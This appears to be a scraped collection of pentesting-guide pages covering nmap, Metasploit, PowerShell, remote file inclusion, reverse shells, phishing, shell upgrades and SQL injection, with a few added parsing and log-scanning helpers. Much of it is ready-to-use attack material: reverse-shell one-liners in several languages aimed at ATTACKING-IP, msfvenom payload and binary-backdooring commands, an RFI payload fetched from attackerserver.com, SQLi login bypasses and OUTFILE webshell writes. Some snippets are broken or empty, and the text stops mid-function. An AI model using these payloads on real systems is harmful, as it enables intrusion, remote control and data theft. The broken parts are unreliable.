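# Nmap 7.80 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -vvv -p 22,80 -oG - 201.210.67.0-100
Host: 201.210.67.1 ()\tStatus: Up
Host: 201.210.67.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///\tIgnored State: closed (0)
Host: 201.210.67.2 ()\tStatus: Down
Host: 201.210.67.14 (web.example.test)\tStatus: Up
Host: 201.210.67.14 (web.example.test)\tPorts: 22/filtered/tcp//ssh///, 80/open/tcp//http///
Host: 201.210.67.33 ()\tStatus: Up
Host: 201.210.67.33 ()\tPorts: 22/open/tcp//ssh///, 80/closed/tcp//http///
# Nmap done at Mon Jan  1 10:00:05 2024 -- 101 IP addresses (3 hosts up) scanned in 4.90 seconds
"""

# "Host: <ip> (<hostname>)" opens every data line; fields after it are tab-separated.
HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)")


def ip_key(ip):
    """Sort key so that 201.210.67.14 sorts after 201.210.67.1, not before."""
    return tuple(int(octet) for octet in ip.split("."))


def parse_grepable(text):
    """Return {ip: {"hostname": str, "up": bool, "ports": {port: (state, proto, service)}}}."""
    hosts = defaultdict(lambda: {"hostname": "", "up": False, "ports": {}})
    for line in text.splitlines():
        if line.startswith("#"):
            continue  # banner and summary lines carry no host data
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, hostname = m.group(1), m.group(2)
        entry = hosts[ip]
        entry["hostname"] = hostname
        for field in line.split("\t")[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["up"] = (value == "Up")
            elif key == "Ports":
                for port_spec in value.split(", "):
                    # port/state/proto/owner/service/rpcinfo/version/
                    parts = port_spec.split("/")
                    port, state, proto, service = int(parts[0]), parts[1], parts[2], parts[4]
                    entry["ports"][port] = (state, proto, service)
                    entry["up"] = True  # a host with port results answered the scan
    return dict(hosts)


def hosts_up(text):
    """Equivalent of the `grep -B 1 "Host is up"` step, as a sorted list of IPs."""
    return sorted((ip for ip, h in parse_grepable(text).items() if h["up"]), key=ip_key)


def hosts_with_open_port(text, port):
    """Equivalent of the `grep 80/open` step for an arbitrary port."""
    return sorted((ip for ip, h in parse_grepable(text).items()
                   if h["ports"].get(port, ("",))[0] == "open"), key=ip_key)


if __name__ == "__main__":
    print("up:", hosts_up(SAMPLE_OG))
    print("port 80 open:", hosts_with_open_port(SAMPLE_OG, 80))
    print("port 22 open:", hosts_with_open_port(SAMPLE_OG, 22))
```

Feed it a real file with `parse_grepable(open("scan.gnmap").read())`; the `Ignored State` field and any other field nmap adds are skipped rather than breaking the parse, and a `filtered` or `closed` port is kept in the structure so you can tell the two apart later, which the `grep 80/open` one-liner cannot.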
### db_nmap

You can run `db_nmap` and all the output will be stored in the Metasploit database and available with:

```
hosts
services
```

You can also import nmap scans. But you must first output them in XML format with the following flag:

```
nmap 192.168.1.107 -oX result.xml
```

Good practice would be to output the scan results in XML, grepable and normal format at once. You do that with:

```
nmap 192.168.1.107 -oA result
```

Then you can load it into the database with the following command:

```
db_import /path/to/file.xml
```

### Metasploit PortScan modules

If you for some reason don't have access to nmap you can run Metasploit's modules that do port scans:

```
use auxiliary/scanner/portscan/
```

--------------------------------------------------------------------------------
/post_exploitation.md:
--------------------------------------------------------------------------------

# Post Exploitation

In order to move horizontally on the network we need to know as much about the machine as possible. We need to loot it. These are some things that must be done on every compromised machine.

### Tcp dump

Who else is connected to the machine?

### Dump the hashes

It is always good to have a list of all the hashes and crack them. Maybe someone is reusing the password.

### To what is the machine connected?

```
netstat

ipconfig
```

### Email and personal files

### Logs

--------------------------------------------------------------------------------
/powershell.md:
--------------------------------------------------------------------------------

# PowerShell

PowerShell is Windows' newer shell. It comes by default from Windows 7.
But it can be downloaded and installed on earlier versions.

* PowerShell provides access to almost everything an attacker might want.
* It is based on the .NET framework.
* It is basically bash for Windows.
* The commands are case-insensitive.

## Basics

A command in PowerShell is called a **cmdlet**. Cmdlets are named using a verb and a noun, like `Get-Command`: Get is the verb and Command is the noun. Other verbs can be: Remove, Set, Disable, Install, etc.

To get help on how to use a **cmdlet** while in PowerShell (the man page), you do:

```
Get-Help
```

Example:

```
get-help echo
get-help get-command
```

**PowerShell Version and Build**

```
$PSVersionTable
```

### Fundamentals

With `Get-Member` you can list all the properties and methods of the object that a command returns.

```
Get-Member
# For example:
Get-Command | Get-Member
Get-Process | Get-Member
```

Select-XXX

```
Select-Object
```

#### Variables

```
$testVar = "blabla"
```

**Wget / Download a file**

```
Invoke-WebRequest
wget
```

**Grep**

```
# Select-String can be used like grep
get-command | select-string blabla
```

**General commands that can be used on objects**

```
measure-object -word
get-content fil.txt | measure-object -word
```

### Working with filesystem

**List all files in current directory**

```
get-childitem
gci

# List hidden files too
gci -Force

# List all files recursively
gci -rec

# Count the files
(get-childitem).count

# List all files but exclude some folders
gci -exclude AppData | gci -rec -force
```
### Working with files

```
# Read a file
Get-Content
gc
cat

# Count lines of file
(get-content .\file).count

# Select specific line in a file (remember that it starts from 0)
(gc .\file.txt)[10]
gc .\file.txt | Select -index 10
```

### Services

```
# List services
get-service
```

### Network related stuff

Domain information:

```
Get-ADDomain
Get-ADDomainController
Get-ADComputer

# To see a list of all properties do this
get-adcomputer ComputerName -prop *

# Get AD Users
Get-ADUser -f {Name -eq 'Karl, Martinez'} -properties *

# Get all AD Groups
Get-ADGroup -filter *

# Resolve DNS
Resolve-DNSName 10.10.10.10
```

--------------------------------------------------------------------------------
/powershell_scripting2.md:
--------------------------------------------------------------------------------

# Powershell scripting

## Variables

Variables are declared like this:

```powershell
$test = "something"
```

## Execute scripts

For security reasons the default policy for executing scripts is **Restricted**. Here are the different script policies.

**Restricted**: PowerShell won't run any scripts. This is PowerShell's default execution policy.

**AllSigned**: PowerShell will only run scripts that are signed with a digital signature. If you run a script signed by a publisher PowerShell hasn't seen before, PowerShell will ask whether you trust the script's publisher.

**RemoteSigned**: PowerShell won't run scripts downloaded from the Internet unless they have a digital signature, but scripts not downloaded from the Internet will run without prompting.
If a script has a digital signature, PowerShell will prompt you before it runs a script from a publisher it hasn't seen before.

**Unrestricted**: PowerShell ignores digital signatures but will still prompt you before running a script downloaded from the Internet.

Source: http://windowsitpro.com/powershell/running-powershell-scripts-easy-1-2-3

So if we want to run the script `myscript.ps1` we have to set the execution policy.
First let's check what execution policy we currently have:

```powershell
Get-ExecutionPolicy
```

Then we can set the execution policy like this:

```powershell
Set-ExecutionPolicy Unrestricted
```

## References
https://github.com/samratashok/nishang
https://www.youtube.com/watch?v=czJrXiLs0wM

--------------------------------------------------------------------------------
/privilege-escalation-powershell.md:
--------------------------------------------------------------------------------

## Privilege Escalation with Powershell

```
# What modules are available to us?
get-module -listavailable
```

--------------------------------------------------------------------------------
/python_fundamentals.md:
--------------------------------------------------------------------------------

# Python fundamentals

## Array/list

```python
my_list = [1, "string", 3, 4, 5]
for item in my_list:
    print(item)

# Append/push to list
my_list.append("addMe")
```

## Modules

It is always good to modularize your code.
**module1.py**

```python
def addNumbers(numberOne, numberTwo):
    return numberOne + numberTwo
```

**script.py**

```python
import module1

total = module1.addNumbers(1, 2)
print(total)
```

## Pip - package management

Pip is the Python package manager. It can be used to download other modules.

Install pip:

```bash
sudo apt-get install python-pip
```

To install a package:

```bash
pip install package
```

--------------------------------------------------------------------------------
/random-stuff.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/random-stuff.md

--------------------------------------------------------------------------------
/recon-ng.md:
--------------------------------------------------------------------------------

# recon-ng

Recon-ng is a reconnaissance tool that can be used to enumerate subdomains and many other things.

1. Create a workspace
   - We should first start a new workspace for the project we are working on.

`workspace add test.com`

Now we can start using modules, with the `use` command.

It follows this pattern, using autocomplete:

`use recon/domains-contacts/pgp_search`

Then we can look at the options:

`show options`

Then set the options:

`set source test.com`

If you have already set a workspace the source default will be test.com.

To run the module we just run:
`run`

Then the hosts or contacts table might be updated, depending on what is found. We can see what is updated by looking at the dashboard.
`show dashboard`

Then:

`show hosts`

--------------------------------------------------------------------------------
/remote_file_inclusion.md:
--------------------------------------------------------------------------------

# Remote File Inclusion

Remote file inclusion uses pretty much the same vector as local file inclusion.

A remote file inclusion vulnerability lets the attacker execute a script on the target machine even though it is not hosted on that machine.

RFIs are less common than LFIs, because in order to get them to work the developer must have edited the `php.ini` configuration file.

This is how they work.

So you have an unsanitized parameter, like this:

```
$incfile = $_REQUEST["file"];
include($incfile.".php");
```

Now what you can do is include a file that is not hosted on the victim server, but instead on the attacker's server:

```
http://exampe.com/index.php?page=http://attackerserver.com/evil.txt
```

And evil.txt will look something like this:

```
# Or just get a reverse shell directly like this:
/dev/tcp/10.11.0.191/443; sh <&196 >&196 2>&196"); ?>
```

So when the victim server includes this file it will automatically execute the commands that are in the evil.txt file. And we have RCE.

## Avoid extensions

Remember to add the null byte `%00` to avoid appending `.php`. This will only work on PHP before version 5.3.

If it does not work you can also add a `?`; this way the rest will be interpreted as URL parameters.

--------------------------------------------------------------------------------
/reverse-shell.md:
--------------------------------------------------------------------------------

# Reverse-shells

This is a great collection of different types of reverse shells and webshells.
Many of the ones listed below come from these cheat sheets:
[https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)

[http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

## Msfvenom

There is an important difference between non-staged and staged payloads. A **non-staged** shell is sent over in one block. You just send the shell in one stage. This can be caught with the Metasploit multi-handler, but also with netcat.

**Staged** shells are sent in turns. This can be useful when you have a very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it and sets up the connection, and then it sends some more. This can be caught with the Metasploit multi-handler but not with netcat.

### Windows

#### Meterpreter

**Standard meterpreter**

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exe
```

```
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
```

**Meterpreter HTTPS**

It makes the meterpreter traffic look normal. Since it is hidden in HTTPS the communication is encrypted and can be used to bypass deep packet inspection.
```
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exe
```

#### Non-staged payload

```
msfvenom -p windows/shell_reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o shell_reverse_tcp.exe
```

```
use exploit/multi/handler
set payload windows/shell_reverse_tcp
```

#### Staged payload

```
msfvenom -p windows/shell/reverse_tcp LHOST=196.168.0.101 LPORT=445 -f exe -o staged_reverse_tcp.exe
```

This must be caught with Metasploit. It does not work with netcat.

```
use exploit/multi/handler
set payload windows/shell/reverse_tcp
```

### Inject payload into binary

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
```

## Linux

### Binary

```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f elf > shell.elf
```

### Bash

```
0<&196;exec 196<>/dev/tcp/192.168.1.101/80; sh <&196 >&196 2>&196
```

```
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

### Php

```
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
```

### Netcat

**Bind shell**

```
# Linux
nc -vlp 5555 -e /bin/bash
nc 192.168.1.101 5555

# Windows
nc.exe -nlvp 4444 -e cmd.exe
```

**Reverse shell**

```
# Linux
nc -lvp 5555
nc 192.168.1.101 5555 -e /bin/bash

# Windows
nc -lvp 443
nc.exe 192.168.1.101 443 -e cmd.exe
```

**With -e flag**

```
nc -e /bin/sh ATTACKING-IP 80
```

```
/bin/sh | nc ATTACKING-IP 80
```

**Without -e flag**

```
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
```

Upgrade a netcat shell to an interactive one: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

### Ncat

Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentest job you might not want to communicate unencrypted.

Bind:

```
ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
ncat -v 192.168.1.103 5555 --ssl
```

### Telnet

```
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
```

```
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
```

### Perl

```
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

### Ruby

```
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

### Java

```
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```

### Python

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

## Web-shells - Platform Independent

### PHP

This PHP shell is OS-independent. You can use it on both Linux and Windows.
```
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.php
```

### ASP

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f asp > shell.asp
```

### WAR

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f war > shell.war
```

### JSP

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f raw > shell.jsp
```

--------------------------------------------------------------------------------
/scanning.md:
--------------------------------------------------------------------------------

# Recon and Information Gathering Phase

So once you have decided on a target you want to start your recon process.

The recon phase is usually divided up into two phases.

1. Passive information gathering / OSINT

   This is when you check out stuff like:
   - Web information
   - Email Harvesting
   - Whois enumeration

2. Active information gathering

   This is when you start scanning the target with your different tools.

--------------------------------------------------------------------------------
/scripting_with_python.md:
--------------------------------------------------------------------------------

# Scripting With Python

There are many high-level scripting languages that are easy to use. One really popular one is Python.
--------------------------------------------------------------------------------
/server-side-vulnerabilities.md:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/server-side-vulnerabilities.md

--------------------------------------------------------------------------------
/session-fixation.md:
--------------------------------------------------------------------------------

## Session Fixation

Session fixation is a pretty small but common vulnerability.

A common way to handle the fact that HTTP is a stateless protocol is to store a cookie in the user's browser, and then have that cookie sent to the web server on each subsequent request. This way the web server can know that the user has visited the website before. So when a user logs in to a web application a cookie for that session is usually created, in order for the web server to know that the session is active.

Session fixation happens when the session identifier (in this case the cookie) is set before the user has authenticated (which is usually done with a simple username/password login), and then not changed when the user authenticates.

For example, let's say you want to log in to a web application. When you first visit the site the following cookie is set:

```
SessionID=123ad76dab97b23ba8d76a
```

You then authenticate with your username and password and make a successful login. But the SessionID cookie does not change. Then you have a session fixation vulnerability on your hands, because this means that if an attacker can set the SessionID cookie to a value the attacker knows, the attacker will know the SessionID cookie once the user actually authenticates.

### How to set the cookie?
**In GET request** - if the session token is sent in the URL of a GET request the attacker can simply send a link which contains the attacker-controlled session token.

**XSS** - If the attacker has also found an XSS vulnerability she can use it to set the cookie. This can of course be mitigated by setting the HttpOnly attribute on the cookie.

**META-tag** - If the attacker has the ability to inject HTML code she can use the META tag to set the cookie.

```
http://website.kon/
```

**MITM** - By being MITM the attacker can set the cookie.

--------------------------------------------------------------------------------
/setuid_c-code.md:
--------------------------------------------------------------------------------

# Setuid c-code

Sometimes you need setuid code. Here is a great snippet for it.

https://gist.github.com/jblyberg/3899599

```c
#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main(int argc, char **argv, char **envp)
{
    char *clean_env[] = { NULL };   /* empty environment for the child */

    (void)argc;
    /* make the real uid/gid match the effective (setuid/setgid) ones, so the
       script we exec keeps the elevated privileges */
    if (setgid(getegid())) perror("setgid");
    if (setuid(geteuid())) perror("setuid");
    envp = clean_env;   /* blocks IFS attack on non-bash shells */
    execve("/path/to/bash/script", argv, envp);
    perror(argv[0]);    /* only reached if execve fails */
    return errno;
}
```

--------------------------------------------------------------------------------
/smtp-user-enum.md:
--------------------------------------------------------------------------------

# smtp-user-enum

You can find more about this in Server-side-vulnerabilities/List of common ports/Port 25:
https://bobloblaw.gitbooks.io/security/content/list_of_common_ports.html

--------------------------------------------------------------------------------
/social_engineering_-_phishing.md:
--------------------------------------------------------------------------------

# Social Engineering - Phishing

Gaining initial access to a
network is often done using different kinds of social engineering attacks.

## Auto-download a malicious file

The technical part is not really that difficult here. In order to auto-download a file you just add this script to the malicious webpage:

```
```

Another way to do it is like this:

```
```

Of course the user will have to accept the download, unless the user has previously ticked the box to download automatically. The user must then click the file for it to execute. This is where the social engineering part comes in: you really must trick the user into executing the file.

### Change the filename

Since Windows by default hides the file extension you can call your file shell.jpg.exe, and once downloaded onto the machine Windows will display it as "shell.jpg".

### Embed malicious code in legitimate file

It is however very likely that this will be picked up by an antivirus.

```
msfvenom -a x86 --platform windows -x nc.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=53 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o ncMalicious.exe
```

## Autodownload a malicious javascript-file

Just like we can make a user download an exe, we can also make that user download a JavaScript file, since JavaScript files can execute commands on Windows.

```
var oShell = new ActiveXObject("Shell.Application");
var commandtoRun = "C:\\Windows\\system32\\calc.exe";
oShell.ShellExecute(commandtoRun,"","","open","1");
```

```
http://evilsite.com/file.js
```

This code can be modified to create a wget script and then download and execute a script.

## Phishing

The most common tool for social engineering is the Social Engineering Toolkit, SET. It comes by default in Kali.
Run it like this:

```
setoolkit
```

## Spear phishing

## Word/excel macros

An explanation of how to create a malicious macro word-file.

https://www.offensive-security.com/metasploit-unleashed/vbscript-infection-methods/

## Embed an executable inside a PowerPoint

You can embed executables inside PowerPoint presentations and then have them execute via animations.

## Reference:
https://www.youtube.com/watch?v=NTdthBQYa1k

--------------------------------------------------------------------------------
/spawning_shells.md:
--------------------------------------------------------------------------------
# Spawning shells

## Non-interactive tty-shell

If you have a non-tty-shell there are certain commands and things you can't do. This can happen if you upload reverse shells on a webserver, so that the shell you get is run by the user www-data, or similar. These users are not meant to have shells as they don't interact with the system as humans do.

So if you don't have a tty-shell you can't run `su` or `sudo`, for example. This can be annoying if you manage to get a root password but can't use it.

Anyway, if you get one of these shells you can upgrade it to a tty-shell using the following methods:

**Using python**

```
python -c 'import pty; pty.spawn("/bin/sh")'
```

**Echo**

```
# typed inside an interactive python shell
echo os.system('/bin/bash')
```

**sh**

```
/bin/sh -i
```

**bash**

```
/bin/bash -i
```

**Perl**

```
perl -e 'exec "/bin/sh";'
```

**From within VI**

```
:!bash
```

## Interactive tty-shell

So if you manage to upgrade to a non-interactive tty-shell you will still have a limited shell.
You won't be able to use the up and down arrows, and you won't have tab-completion. This can be really frustrating if you stay in that shell for long. It can also be more risky: if an execution gets stuck you can't use Ctrl-C or Ctrl-Z without killing your session. However that can be fixed using socat. Follow these instructions.

https://github.com/cornerpirate/socat-shell

## References:

http://unix.stackexchange.com/questions/122616/why-do-i-need-a-tty-to-run-sudo-if-i-can-sudo-without-a-password
http://netsec.ws/?p=337
http://pentestmonkey.net/blog/post-exploitation-without-a-tty

--------------------------------------------------------------------------------
/sql-injections.md:
--------------------------------------------------------------------------------
# SQL-injections

## Tldr

```
# Post
./sqlmap.py -r request.txt -p username

# Get
sqlmap -u "http://192.168.1.101/index.php?id=1" --dbms=mysql

# Crawl
sqlmap -u http://192.168.1.101 --dbms=mysql --crawl=3
```

## How do sql-injections work?

So we have a website that is written in php. We have a login functionality, where the code looks like this:

```php
mysql_connect("localhost", "pelle", "mySecretPassword") or die(mysql_error());

mysql_select_db("myHomepage");

if ($_POST['username'] != ""){
    $username = $_POST['username'];
    $password = $_POST['password'];
    // user input is concatenated straight into the query string
    $query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";
    $result = mysql_query($query);
    $row = mysql_fetch_array($result);
}
```

So the user input is not filtered or sanitized in any way, which means that whatever the user puts in the login-form will be executed by mysql. So just like in xss-injections we just try to escape the input field to be able to execute sql-commands.
So if we input the following into the user-field and password-field in the login:

```
whatever' or '1'='1
whatever' or '1'='1
```

The query will look like this:

```
$query = "SELECT * FROM users WHERE username = 'whatever' OR '1'='1' AND password='whatever' OR '1'='1'";
```

Since they both become true the database will retrieve all users and we will be able to bypass the login.

If you know the username you could of course use that and then only inject on the password parameter.

```
$query = "SELECT * FROM users WHERE username = 'admin' AND password='whatever' OR '1'='1'";
```

## SQLmap

Sqlmap is a great tool to perform sql-injections.
Here is the manual.
https://github.com/sqlmapproject/sqlmap/wiki/Usage

### Using sqlmap with login-page

So you need to authenticate before you can access the vulnerable parameter.

You just capture the request using Burp Suite, and save the request in a file. Then you run

```
sqlmap -r request.txt
```

Since the cookie is saved in the request sqlmap can do it.

### Crawl a page to find sql-injections

```
sqlmap -u http://example.com --crawl=1
```

### Dumping a database or table

Here we are dumping the database Webapp and the table Users.

```
sqlmap -r request.txt -p username --dbms=mysql --dump -D Webapp -T Users
```

### Use proxy

```
--proxy="http://192.2.2.2.2:1111"
```

**Proxy credentials**

```
--proxy-cred="username:password"
```

## Login bypass

This is the most classic, standard first test:
```
' or '1'='1
```

Then you have:

```
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
```

## Sql-injections manually

Sqlmap is good, but it is not very stealthy, and it can generate a lot of traffic. It is also good to understand the vulnerability in the code and not just run tools. So let's learn sql-injections the manual way.

The two main ways to perform a sql-injection: **error based** or **blind**.

### Error-based DB enumeration

If we manage to find an error-message after a broken sql-query, we can use that to try to map out the database structure.

For example, if we have a url that ends with

```
http://example.com/photoalbum.php?id=1
```

#### Step 1 - Add the tick '

So first we should try to break the sql-syntax by adding a `'` or a `"`.

```
http://example.com/photoalbum.php?id=1'
```

If the page then returns a blank page or a page with a sql-error we know that the page is vulnerable.

#### Step 2 - Enumerate columns

So in order to enumerate the columns of a table we can use **order by**.

**Order by 1** means sort by the values of the first column from the result set.
**Order by 2** means sort by the values of the second column from the result set.

So it is basically just a tool to order the data in a table. But we can use it to find out how many columns a table has, because if we do **order by 10** when there really are only 9 columns sql will throw an error, and then we know how many columns the table has.

```
# This throws no error
http://example.com/photoalbum.php?id=1 order by 9
# This throws an error
http://example.com/photoalbum.php?id=1 order by 10
```

So you just increase the number (or do a binary search if you want to do it a bit faster) until you get an error, and then you know how many columns the table has.

#### Step 3 - Find space to output db

Now we need to know which columns are being output on the webpage. It could be that not all data from the database is worthwhile to output, so maybe only columns 1 and 3 are being output on the website.

To find out which columns are being output we can use the **union select** command. So we do the command like this

```
http://example.com/photoalbum.php?id=1 union select 1,2,3,4,5,6,7,8,9
```

for all the columns that exist. This will show the numbers of the columns that are being output on the website. Take note of which these columns are.

#### Step 4 - Start enumerating the database

Now we can use that field to start outputting data. For example, if column number five was visible in step 3, we can use that to output the data.

Here is a list of data we can retrieve from the database.
Some of the syntax may differ depending on the database engine (mysql, mssql, postgres).

```
# Get username of the sql-user
http://example.com/photoalbum.php?id=1 union select 1,2,3,4,user(),6,7,8,9

# Get version
http://example.com/photoalbum.php?id=1 union select 1,2,3,4,version(),6,7,8,9

# Get all tables
http://example.com/photoalbum.php?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables

# Get all columns from a specific table
http://example.com/photoalbum.php?id=1 union select 1,2,3,4,column_name,6,7,8,9 from information_schema.columns where table_name = 'users'

# Get content from the users-table, from the columns name and password. The 0x3a only serves to create a delimiter between name and password
http://example.com/photoalbum.php?id=1 union select 1,2,3,4,concat(name,0x3a,password),6,7,8,9 FROM users
```

### Blind sql-injection

We say that it is blind because we do not have access to the error log. This makes the whole process a lot more complicated, but it is of course still possible to exploit.

#### Using sleep

Since we do not have access to the logs we do not know if our commands are syntactically correct or not. To know if it is correct or not we can however use the sleep statement.

```
http://example.com/photoalbum.php?id=1-sleep(4)
```

If it loads for four seconds extra we know that the database is processing our sleep() command.

### Get shell from sql-injection

The good part about mysql from a hacker-perspective is that you can actually use sql to write files to the system. This lets us write a backdoor to the system that we can use.

#### Load files

```
UNION SELECT 1, load_file('/etc/passwd') #
```

#### Write files

```
http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'

http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE '/var/www/html/cmd.php'
```

#### MSSQL - xp_cmdshell

You can run commands straight from the sql-query in MSSQL.

## Truncating Mysql Vulnerability

Basically this happens when you don't validate the length of user input.
Two things are needed for it to work:

- Mysql does not make comparisons in binary mode. This means that "admin" and "admin " are the same.

- If the username column in the database has a character-limit the rest of the characters are truncated, that is, removed. So if the database has a column-limit of 20 characters and we input a string with 21 characters the last character will be removed.

With this information we can create a new admin-user and have our own password set to it. So if the max-length is 20 characters we can insert the following string (the spaces pad "admin" out to the 20-character limit):

```
admin               removed
```

This means that the "removed" part will be removed/truncated/deleted, and the trailing spaces will be removed upon insert in the database. So it will effectively be inserted as "admin".
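The login from the "How do sql-injections work?" section, rewritten as an added example (not code from the original page) against an in-memory SQLite table: the page's `whatever' or '1'='1` input returns every user from the concatenated query and nothing from the parameterized one. The table rows are constructed sample data.

```python
import sqlite3

QUERY_TEMPLATE = "SELECT username FROM users WHERE username = '%s' AND password = '%s'"


def make_db():
    """Constructed stand-in for the page's MySQL 'users' table (sample rows, not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("admin", "hunter2"), ("pelle", "sommar")])
    db.commit()
    return db


def rendered_query(username, password):
    """The SQL string the database actually receives in the vulnerable case."""
    return QUERY_TEMPLATE % (username, password)


def login_vulnerable(db, username, password):
    """Same construction as the page's PHP: the input is pasted into the SQL string,
    so a quote in the input becomes part of the query's syntax.
    Returns the usernames the query matched (an empty list means login failed)."""
    return sorted(row[0] for row in db.execute(rendered_query(username, password)))


def login_safe(db, username, password):
    """Parameterized form: the driver sends the values separately from the SQL text,
    so a quote in the input is only a character to compare against."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in db.execute(query, (username, password)))


if __name__ == "__main__":
    db = make_db()
    payload = "whatever' or '1'='1"
    print(rendered_query(payload, payload))
    print("concatenated query matched:", login_vulnerable(db, payload, payload))
    print("parameterized query matched:", login_safe(db, payload, payload))
```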
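A defender-side complement to the manual enumeration steps above, added here and not part of the original page: a scanner over web-server access-log lines that flags the quote break with a server error (step 1), the ORDER BY probes (step 2), UNION SELECT (step 3), information_schema reads, sleep() timing probes and load_file/INTO OUTFILE. The log lines, IPs, timestamps and sizes are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines replaying this page's steps against photoalbum.php.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /photoalbum.php?id=1 HTTP/1.1" 200 5123
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /photoalbum.php?id=1' HTTP/1.1" 500 312
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /photoalbum.php?id=1%20order%20by%209 HTTP/1.1" 200 5123
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /photoalbum.php?id=1%20order%20by%2010 HTTP/1.1" 500 312
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /photoalbum.php?id=1%20union%20select%201,2,3,4,user(),6,7,8,9 HTTP/1.1" 200 5200
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /photoalbum.php?id=1-sleep(4) HTTP/1.1" 200 5123
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /photoalbum.php?id=2 HTTP/1.1" 200 4980
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# (rule name, regex applied to the URL-decoded query string); None is handled specially.
RULES = [
    ("column-count probe (ORDER BY n)", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("UNION SELECT column discovery", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema read (information_schema)", re.compile(r"information_schema\.", re.I)),
    ("time-based blind probe (sleep)", re.compile(r"\bsleep\s*\(", re.I)),
    ("file read/write (load_file / INTO OUTFILE)",
     re.compile(r"load_file\s*\(|\binto\s+(out|dump)file\b", re.I)),
    ("quote break followed by server error", None),
]


def scan_access_log(text):
    """Return one (ip, timestamp, rule, decoded query) tuple per rule hit, in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
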